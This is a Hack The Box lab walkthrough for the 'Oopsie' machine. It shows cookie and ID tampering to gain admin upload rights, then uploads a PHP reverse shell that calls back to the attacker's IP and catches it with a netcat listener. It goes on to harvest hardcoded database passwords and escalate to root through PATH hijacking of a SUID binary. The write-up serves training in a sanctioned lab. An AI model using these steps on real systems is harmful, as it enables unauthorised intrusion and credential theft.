---
sidebar_position: 2
sidebar_label: 🐂 Oopsie
description: ''
last_update:
  date: 2022/06/13
  author: Raúl Sánchez
tags:
  - BurpSuite
  - Cookies Hacking
  - Reverse Shell - PHP
  - Gobuster
  - netcat
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# Oopsie

## 0. Start the machine

To start machine, Just click "Spawn Machine".

![Spawn Oopsie machine](oopsie1.png)

Then you can see the **IP** address for that machine. In this case the machine has the IP `10.129.82.131`. Before going to enumeration steps we can simply ping to the IP address and check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 10.129.82.131
PING 10.129.82.131 (10.129.82.131) 56(84) bytes of data.
64 bytes from 10.129.82.131: icmp_seq=1 ttl=63 time=54.0 ms

--- 10.129.82.131 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 53.958/53.958/53.958/0.000 ms
```

:::caution Disclaimer
No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️
:::

## 1. Enumeration

The first thing to do is to identify which operating system you are using. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool to find out.

```python
❯ whichSystem.py 10.129.82.131

10.129.82.131 (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

* [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
* \-sC : performs a script scan using the default set of scripts.

```python
❯ nmap -sV -sC 10.129.82.131
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-13 16:35 CEST
Nmap scan report for 10.129.82.131
Host is up (0.048s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Welcome
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.94 seconds
```

As we see, there are two open ports. The port 22/tcp is [ssh](https://www.ssh.com/) and the port 80/tcp is running a http server with [Apache](https://apache.org) in Ubuntu.

:::note
The **Secure Shell Protocol** is a cryptographic network protocol for operating network services securely over an unsecured network.
:::

### 1.2 Web

Using the web browser, we can visit the IP where we face a website for automotive.

![Website of the target.](oopsie2.png)

We can see interesting information about how one can access the services through login.

![Instructions of login.](oopsie3.png)

### 1.3 Burpsuite

We can try to map website by using `Burp Suite proxy` to passively spider the website. First we will start Burp Suite, and configure browser to send traffic through proxy.

![Configure proxy settings on Firefox.](oopsie4.png)

Then, we need to disable the interception in Burp suite as it's enabled by default.

![Disable intercept in burp-suite.](oopsie5.png)

Refresh the page in the browser and switch in Burp Suite under the `Target` tab and then on the Sitemap option.

![Spot some directories.](oopsie6.png)

We notice a very interesting directory named `/cdn-cgi/login`. Let's try to visit it in the browser.

![Login page.](oopsie7.png)

We can access as a Guest.

![Guest page.](oopsie8.png)

We try to access on all the pages but It is not possible as we need to have super admin rights.&#x20;

### 1.4 Manipulate cookies

Using the developer tools we see in the `cookies` that there is a `role=guest` and `user=2233` which we can assume that if we somehow knew the number of super admin for the user variable, we might be able to gain access to the upload page.

![Storage tab > Cookies.](oopsie9.png)

If we check the `URL` on our browsers bar again  we will see that there is an `id` for every user. Changing the `id` variable to **1** we can see the admin information.

![Change id variable.](oopsie10.png)

So we will move to the upload page that requires admin rights.

![Upload page.](oopsie11.png)

Change the values of the user for the information of the admin and refresh.

![Edit cookies.](oopsie12.png)

Now we can upload files to the server.

![Upload files as an admin.](oopsie13.png)

## 2. Foothold

### 2.1 Reverse Shell

In this case we are going to upload a `php reverse` [shell](https://github.com/BlackArch/webshells) which is in `/usr/share/webshells/php/php-reverse-shell.php` . Follow the next steps in order to edit and upload the file.

```python
# Copy the file to your working directory
❯ cp /usr/share/webshells/php/php-reverse-shell.php ~/HTB/Oopsie

# Change to the last directory
❯ cd !$
cd ~/HTB/Oopsie

# Give all rights to the file
❯ chmod 777 php-reverse-shell.php

# Edit the file
❯ vim php-reverse-shell.php
```

Edit the file with your values.

```php
❯ cat php-reverse-shell.php
set_time_limit (0);
$VERSION = "1.0";
$ip = 'TUN0_IP_ADDRESS';  // CHANGE THIS
$port = 1234;  
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
```

Save the file and upload it.

![File uploaded.](oopsie14.png)

Now we might need to `bruteforce` directories in order to locate the folder where the uploaded files are stored.&#x20;

```python
❯ sudo gobuster dir --url http://10.129.82.131/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.82.131/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/06/13 17:16:37 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 315] [--> http://10.129.82.131/images/]
/index.php            (Status: 200) [Size: 10932]                                 
/themes               (Status: 301) [Size: 315] [--> http://10.129.82.131/themes/]
/uploads              (Status: 301) [Size: 316] [--> http://10.129.82.131/uploads/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.82.131/css/]    
/js                   (Status: 301) [Size: 311] [--> http://10.129.82.131/js/]     
/fonts                (Status: 301) [Size: 314] [--> http://10.129.82.131/fonts/]
                                                                                   
===============================================================
2022/06/13 17:20:00 Finished
===============================================================
```

We see the `/uploads` directory so if we try to access we see that we don't have permission.&#x20;

![Forbidden.](oopsie15.png)

Instead we can try access our uploaded file directly. But first setup a `netcat` connection.

```python
# Add a firewall rule to allow connections to the port 1234
❯ sudo ufw allow from 10.129.82.131 proto tcp to any port 1234
Rule added

# Start the netcat listenet
❯ sudo rlwrap nc -nlvp 1234
```

After that,  request our shell through the browser.

```python
http://10.129.82.131/uploads/php-reverse-shell.php
```

Now check the listener and boom! we are in!

```python
listening on [any] 1234 ...
connect to [10.10.14.158] from (UNKNOWN) [10.129.82.131] 36640
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 15:22:02 up 49 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
```

In order to have a functional shell though we can issue the following python command.

```python
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

### 2.2 Lateral Movement

As user `www-data`, we can find some interesting `php` files under `/var/www/html/cdn- cgi/login` directory.

```shell
cd /var/www/html/cdn-cgi/login
ls
admin.php  db.php  index.php  script.js
```

We can use `cat *` to read all files while pipeing the output to `grep`. We can also use the switch `-i` to ignore case sensitive words like `Password`.

```python
cat * | grep -i passw*
if($_POST["username"]==="admin" && $_POST["password"]==="MEGACORP_4dm1n!!")
<input type="password" name="password" placeholder="Password" />
```

We see the password `MEGACORP_4dm1n!!`. Now we can check the available users are on the system by reading the `/etc/passwd` file so we can try a password reuse of this password.

```python
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
```

We found user `robert`. So we try to login with the previous password.

```bash
su robert
MEGACORP_4dm1n

su: Authentication failure
```

Unfortunately, that wasn't the password for user `robert` . If we read the file `db.php` we will find the password of the user `robert`.

```php
❯ cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
```

Now that we got the password we can successfully login. And we can find the user flag in his `home` directory.

```shell
su robert
M3g4C0rpUs3r!
cd ~/
ls
cat user.txt
```

### 2.3 Privilege Escalation

Now we will move to the `/tmp` directory to create a cat file and then add it to the `$PATH`.

```shell
# Move to the /tmp directory
cd /tmp

# Create the file
echo "/bin/sh" > cat

# Give execution privileges
chmod +x cat

# Add the /tmp directory to the PATH environmental variable
export PATH=/tmp:$PATH
```

Finally execute the `bugtracker` from `/tmp` directory.

```shell
/usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

1
1
---------------

whoami
root
```

We will find the flag in the /root folder, but we can't see it from this shell, so copy the file to the `robert` home directory.

```shell
cd /root
cp root.txt /home/robert/
```

Finally, repeat the previous steps to login with the user `robert` and you will have both flags in the home directory.

```shell
❯ sudo rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.14.158] from (UNKNOWN) [10.129.82.131] 36864
Linux oopsie 4.15.0-76-generic #86-Ubuntu SMP Fri Jan 17 17:24:28 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 15:40:45 up  1:08,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

python3 -c 'import pty;pty.spawn("/bin/bash")'

su robert
M3g4C0rpUs3r!

cd ~/
ls
root.txt  user.txt

cat root.txt
```
